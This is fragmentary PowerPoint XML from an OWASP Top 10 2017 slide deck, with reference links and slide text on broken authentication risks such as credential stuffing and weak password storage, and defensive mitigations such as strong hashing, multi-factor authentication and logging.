Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project"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Reflected_Cross_site_scripting_(OTG-INPVAL-001)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/knowledgebase/issues/details/00200308_clientsidetemplateinjection" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.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DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Content_Security_Policy" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection"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s://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html"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3.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5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/report/89bnfUyJ"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3.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5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2017/08/465k-patients-need-a-firmware-update-to-prevent-serious-pacemaker-hacks/"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nvd.nist.gov/"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cwe.mitre.org/data/definitions/223.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/products" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" TargetMode="External"/><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hyperlink" Target="https://www.owasp.org/index.php/Logging_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#8:_Implement_Logging_and_Intrusion_Detection" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html"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2.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Guide_Project"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notesSlide" Target="../notesSlides/notesSlide21.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><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hyperlink" Target="https://www.owasp.org/index.php/Top_10_2010" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top10" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007"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9.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2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www.owasp.org/index.php/top10" TargetMode="External"/><Relationship Id="rId5"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hyperlink" Target="https://www.owasp.org/index.php/ASVS"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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=49168" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator" TargetMode="Externa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hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asd.gov.au/infosec/mitigationstrategies.htm" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/isoiec-27001-information-security.html"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Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Command_Injection_Defense_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/knowledgebase/issues/details/00101080_serversidetemplateinjection"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www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_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12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6858000" cy="42672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04800" y="3201130"/>
            <a:ext cx="4170316" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" spc="0" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>Golden Master (golden-master, post RC2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ln w="24500" cmpd="dbl">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" cap="none" spc="0" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>omments requested per</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t> i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" cap="none" spc="0" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>nstructions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
              </a:rPr>
              <a:t>within</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" cap="none" spc="0" dirty="0">
              <a:ln w="24500" cmpd="dbl">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>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5105400" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>OWASP Top 10 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>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t>This work is licensed under a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Creative Commons Attribution-ShareAlike 4.0 International License</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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t>https://owasp.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212467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the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>lists of known passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, is a common attack. If an application does not rate limit authentication attempts, the application can be used as a password oracle to determine if the credentials are valid.</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u="sng"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Insecure password storage (including plain text, reversibly encrypted passwords, and weakly hashed passwords (such as using MD5/SHA1 with or without a salt) can lead to breaches. A recent effort by a small group of researchers cracked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>320 million passwords in less than three weeks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, including long passwords. Instead use modern hashing algorithms such as Argon2, with salting and sufficient work factor to prevent the use of rainbow tables, word lists, etc.</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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a: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Confirmation of the user's identity, authentication, and session management are critical for separating malicious unauthenticated attackers from authorized users.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You may have authentication weaknesses if your application:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, which is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brute force or other automated attacks.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Permits default, weak or well-known passwords, such as "Password1" or "admin/admin“.</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weak or ineffectual credential recovery and forgot password processes, such as "knowledge-based answers", which cannot be made safe.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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Uses plain text, encrypted, or weakly hashed passwords permit the rapid recovery of passwords using GPU crackers or brute force tools.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Has missing or ineffective multi-factor authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Aria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7"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls - Implement Identity and Authentication Controls</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ASVS - V2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId8"/>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ASVS - V3 Session Management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Testing Guide: Identity</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11"/>
              </a:rPr>
              <a:t>Authentication</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2"/>
              </a:rPr>
              <a:t>OWASP Authentication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3"/>
              </a:rPr>
              <a:t>OWASP Credential Stuffing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4"/>
              </a:rPr>
              <a:t>OWASP Forgot Password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5"/>
              </a:rPr>
              <a:t>OWASP Password Storage Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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6"/>
              </a:rPr>
              <a:t>OWASP Session Management Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId16"/>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7"/>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8"/>
              </a:rPr>
              <a:t>NIST 800-63b 5.1.1 Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> – for thorough, modern, evidence based advice on authentication. </a:t>
            </a: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19"/>
              </a:rPr>
              <a:t>CWE-287 Improper Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CWE-384 Session Fixation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900"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Do not ship or deploy with any default credentials, particularly for admin users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hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Store passwords using a modern one way hash function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, such as Argon2 or PBKDF2, with sufficient work factor to prevent realistic GPU cracking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Implement weak password checks, such as testing new or changed passwords against a list of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>top 10000 worst passwords</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Align password length, complexity and rotation policies with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or other modern, evidence based password policies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Ensure registration, credential recovery, and API pathways are hardened against account enumeration attacks by using the same messages for all outcomes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Where possible, implement multi-factor authentication to prevent credential stuffing, brute force, automated, and stolen credential attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Log authentication failures and alert administrators when credential stuffing, brute force, other attacks are detected.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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786146160"/>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FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
